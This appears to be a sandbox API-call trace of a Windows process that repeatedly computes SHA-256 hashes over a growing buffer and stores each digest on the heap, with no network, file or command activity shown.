	[0193.883] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0193.883] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.883] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309820
	[0193.883] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309820, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309820, pdwDataLen=0x1283b0) returned 1
	[0193.883] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.883] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.883] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.884] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.884] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0193.884] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.884] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309848
	[0193.884] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309848, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309848, pdwDataLen=0x1283b0) returned 1
	[0193.884] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.884] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.884] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.884] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.884] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0193.884] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.884] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309870
	[0193.884] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309870, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309870, pdwDataLen=0x1283b0) returned 1
	[0193.884] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.884] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.884] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.885] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.885] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0193.885] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.885] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309898
	[0193.885] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309898, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309898, pdwDataLen=0x1283b0) returned 1
	[0193.885] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.885] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.885] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.885] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.885] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0193.885] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.885] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23098c0
	[0193.885] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23098c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23098c0, pdwDataLen=0x1283b0) returned 1
	[0193.885] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.885] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.885] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.886] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.886] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0193.886] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.886] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23098e8
	[0193.886] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23098e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23098e8, pdwDataLen=0x1283b0) returned 1
	[0193.886] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.886] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.886] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.886] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.886] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0193.886] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.886] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309910
	[0193.886] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309910, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309910, pdwDataLen=0x1283b0) returned 1
	[0193.886] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.886] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.886] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.887] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.887] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0193.887] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.887] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309938
	[0193.887] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309938, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309938, pdwDataLen=0x1283b0) returned 1
	[0193.887] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.887] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.887] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.887] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.887] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0193.887] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.887] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309960
	[0193.887] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309960, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309960, pdwDataLen=0x1283b0) returned 1
	[0193.887] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.887] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.887] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.888] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.888] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0193.888] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.888] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309988
	[0193.888] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309988, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309988, pdwDataLen=0x1283b0) returned 1
	[0193.888] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.888] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.888] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.888] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.888] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0193.888] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.888] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23099b0
	[0193.888] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23099b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23099b0, pdwDataLen=0x1283b0) returned 1
	[0193.888] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.888] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.888] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.889] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.889] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0193.889] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.889] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23099d8
	[0193.889] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23099d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23099d8, pdwDataLen=0x1283b0) returned 1
	[0193.889] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.889] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.889] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.889] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.889] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0193.889] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.889] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309a00
	[0193.889] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309a00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309a00, pdwDataLen=0x1283b0) returned 1
	[0193.889] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.889] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.889] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.890] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.890] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0193.890] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309a28
	[0193.890] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309a28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309a28, pdwDataLen=0x1283b0) returned 1
	[0193.890] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.890] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.890] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.890] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.890] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0193.890] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309a50
	[0193.890] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309a50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309a50, pdwDataLen=0x1283b0) returned 1
	[0193.890] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.890] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.890] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.891] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.891] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0193.891] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.891] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309a78
	[0193.891] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309a78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309a78, pdwDataLen=0x1283b0) returned 1
	[0193.891] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.891] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.891] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.891] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.891] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0193.891] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.891] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309aa0
	[0193.891] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309aa0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309aa0, pdwDataLen=0x1283b0) returned 1
	[0193.891] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.891] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.891] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.892] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.892] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0193.892] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.892] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309ac8
	[0193.892] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309ac8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309ac8, pdwDataLen=0x1283b0) returned 1
	[0193.892] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.892] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.892] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.892] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.892] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0193.892] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.892] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309af0
	[0193.892] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309af0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309af0, pdwDataLen=0x1283b0) returned 1
	[0193.892] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.892] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.892] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.893] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.893] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0193.893] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.893] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309b18
	[0193.893] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309b18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309b18, pdwDataLen=0x1283b0) returned 1
	[0193.893] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.893] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.893] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.894] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.894] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0193.894] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.894] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309b40
	[0193.894] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309b40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309b40, pdwDataLen=0x1283b0) returned 1
	[0193.894] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.894] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.894] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.894] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.894] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0193.894] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.894] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309b68
	[0193.894] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309b68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309b68, pdwDataLen=0x1283b0) returned 1
	[0193.894] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.894] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.894] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.895] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.895] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0193.895] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.895] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309b90
	[0193.895] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309b90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309b90, pdwDataLen=0x1283b0) returned 1
	[0193.895] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.895] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.895] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.895] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.895] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0193.895] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.895] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309bb8
	[0193.895] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309bb8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309bb8, pdwDataLen=0x1283b0) returned 1
	[0193.895] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.895] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.895] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.896] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.896] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0193.896] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.896] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309be0
	[0193.896] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309be0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309be0, pdwDataLen=0x1283b0) returned 1
	[0193.896] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.896] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.896] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2753bd8) returned 1
	[0193.896] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2753bd8
	[0193.896] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.896] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
